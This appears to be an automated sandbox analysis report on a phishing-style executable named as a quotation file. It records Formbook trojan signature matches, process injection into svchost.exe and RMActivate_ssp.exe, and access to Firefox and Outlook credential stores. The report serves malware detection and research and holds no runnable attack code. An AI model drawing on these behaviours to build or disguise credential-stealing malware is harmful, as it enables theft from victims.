Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033870C0	3_2_033870C0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0343F7B0	3_2_0343F7B0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033C5630	3_2_033C5630
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_034316CC	3_2_034316CC
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_03437571	3_2_03437571
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_034495C3	3_2_034495C3
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0341D5B0	3_2_0341D5B0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_03371460	3_2_03371460
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0343F43F	3_2_0343F43F
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0343FB76	3_2_0343FB76
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0339FB80	3_2_0339FB80
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033BDBF9	3_2_033BDBF9
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033F5BF0	3_2_033F5BF0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_03437A46	3_2_03437A46
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0343FA49	3_2_0343FA49
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033F3A6C	3_2_033F3A6C
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0342DAC6	3_2_0342DAC6
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033C5AA0	3_2_033C5AA0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_03421AA3	3_2_03421AA3
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0341DAAC	3_2_0341DAAC
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_03415910	3_2_03415910
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_03389950	3_2_03389950
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0339B950	3_2_0339B950
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033ED800	3_2_033ED800
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033838E0	3_2_033838E0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0343FF09	3_2_0343FF09
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_03381F92	3_2_03381F92
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_03343FD5	3_2_03343FD5
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_03343FD2	3_2_03343FD2
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0343FFB1	3_2_0343FFB1
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_03389EB0	3_2_03389EB0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_03431D5A	3_2_03431D5A
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_03437D73	3_2_03437D73
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_03383D40	3_2_03383D40
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0339FDC0	3_2_0339FDC0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_033F9C32	3_2_033F9C32
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_0343FCF2	3_2_0343FCF2
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_029B1760	3_2_029B1760
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_029CA0A0	3_2_029CA0A0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_029ACB80	3_2_029ACB80
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_029AC959	3_2_029AC959
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_029AC960	3_2_029AC960
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_029AAECB	3_2_029AAECB
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_029AAC00	3_2_029AAC00
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_029AADD8	3_2_029AADD8
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_029B3270	3_2_029B3270
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_029B326B	3_2_029B326B
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_029B1C70	3_2_029B1C70
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_031BA2F2	3_2_031BA2F2
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_031BB028	3_2_031BB028
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_031BBB04	3_2_031BBB04
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_031BBFC5	3_2_031BBFC5
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_031BBC23	3_2_031BBC23

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03887E54 appears 107 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0382B970 appears 262 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 038AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 038BF290 appears 103 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03875130 appears 58 times
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: String function: 033FF290 appears 103 times
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: String function: 033B5130 appears 58 times
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: String function: 033C7E54 appears 107 times
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: String function: 0336B970 appears 262 times
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: String function: 033EEA12 appears 86 times
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: String function: 00938B40 appears 42 times
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: String function: 00917F41 appears 35 times
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: String function: 00930D27 appears 70 times

Source: PTT Group project - Quotation.exe, 00000000.00000003.1648245387.00000000037F3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PTT Group project - Quotation.exe
Source: PTT Group project - Quotation.exe, 00000000.00000003.1648355217.000000000399D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PTT Group project - Quotation.exe

Source: PTT Group project - Quotation.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.4088478825.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.4087484758.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1762561300.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.4088367341.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1762331518.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4090192746.0000000005020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.4088706556.00000000024B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1764648995.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@13/7

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Code function: 0_2_0097A2D5 GetLastError,FormatMessageW,

0_2_0097A2D5

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_00968713 AdjustTokenPrivileges,CloseHandle,		0_2_00968713
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_00968CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00968CC3

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Code function: 0_2_0097B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0097B59E

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Code function: 0_2_0098F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0098F121

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Code function: 0_2_009886D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_009886D0

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Code function: 0_2_00914FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00914FE9

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

File created: C:\Users\user\AppData\Local\Temp\autC8E0.tmp

Jump to behavior

Source: PTT Group project - Quotation.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RMActivate_ssp.exe, 00000003.00000002.4087642790.0000000002E41000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1944335007.0000000002E41000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: PTT Group project - Quotation.exe	ReversingLabs: Detection: 36%
Source: PTT Group project - Quotation.exe	Virustotal: Detection: 34%

Source: unknown	Process created: C:\Users\user\Desktop\PTT Group project - Quotation.exe "C:\Users\user\Desktop\PTT Group project - Quotation.exe"
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PTT Group project - Quotation.exe"
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	Process created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe"
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PTT Group project - Quotation.exe"	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	Process created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\RMActivate_ssp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\RMActivate_ssp.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: PTT Group project - Quotation.exe

Static file information: File size 1176576 > 1048576

Source: PTT Group project - Quotation.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: PTT Group project - Quotation.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: PTT Group project - Quotation.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: PTT Group project - Quotation.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: PTT Group project - Quotation.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: PTT Group project - Quotation.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: PTT Group project - Quotation.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KWyVcOvVIsFTpZOKF.exe, 00000002.00000000.1682080075.000000000069E000.00000002.00000001.01000000.00000004.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000000.1834850249.000000000069E000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: rmactivate_ssp.pdb source: svchost.exe, 00000001.00000003.1730334364.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1731134326.0000000003701000.00000004.00000020.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000002.00000002.4088107125.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000002.00000002.4092075647.0000000005080000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: PTT Group project - Quotation.exe, 00000000.00000003.1647870847.0000000003680000.00000004.00001000.00020000.00000000.sdmp, PTT Group project - Quotation.exe, 00000000.00000003.1648740790.0000000003870000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1763015202.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1763015202.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1652445015.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1654212029.0000000003600000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4088663441.0000000003340000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1762307903.0000000002FD0000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1772192727.000000000318C000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4088663441.00000000034DE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: PTT Group project - Quotation.exe, 00000000.00000003.1647870847.0000000003680000.00000004.00001000.00020000.00000000.sdmp, PTT Group project - Quotation.exe, 00000000.00000003.1648740790.0000000003870000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1763015202.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1763015202.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1652445015.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1654212029.0000000003600000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, RMActivate_ssp.exe, 00000003.00000002.4088663441.0000000003340000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1762307903.0000000002FD0000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1772192727.000000000318C000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4088663441.00000000034DE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: RMActivate_ssp.exe, 00000003.00000002.4087642790.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4089116810.000000000396C000.00000004.10000000.00040000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.0000000002BEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2051321397.00000000122AC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: RMActivate_ssp.exe, 00000003.00000002.4087642790.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4089116810.000000000396C000.00000004.10000000.00040000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.0000000002BEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2051321397.00000000122AC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: rmactivate_ssp.pdbGCTL source: svchost.exe, 00000001.00000003.1730334364.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1731134326.0000000003701000.00000004.00000020.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000002.00000002.4088107125.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000002.00000002.4092075647.0000000005080000.00000004.00000001.00020000.00000000.sdmp

Source: PTT Group project - Quotation.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: PTT Group project - Quotation.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: PTT Group project - Quotation.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: PTT Group project - Quotation.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: PTT Group project - Quotation.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Code function: 0_2_0098C304 LoadLibraryA,GetProcAddress,

0_2_0098C304

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_00978719 push FFFFFF8Bh; iretd	0_2_0097871B
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_0093E94F push edi; ret	0_2_0093E951
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_0093EA68 push esi; ret	0_2_0093EA6A
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_00938B85 push ecx; ret	0_2_00938B98
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_0093EC43 push esi; ret	0_2_0093EC45
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_0093ED2C push edi; ret	0_2_0093ED2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040A85A push cs; iretd	1_2_0040A85B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00411888 push ecx; ret	1_2_00411891
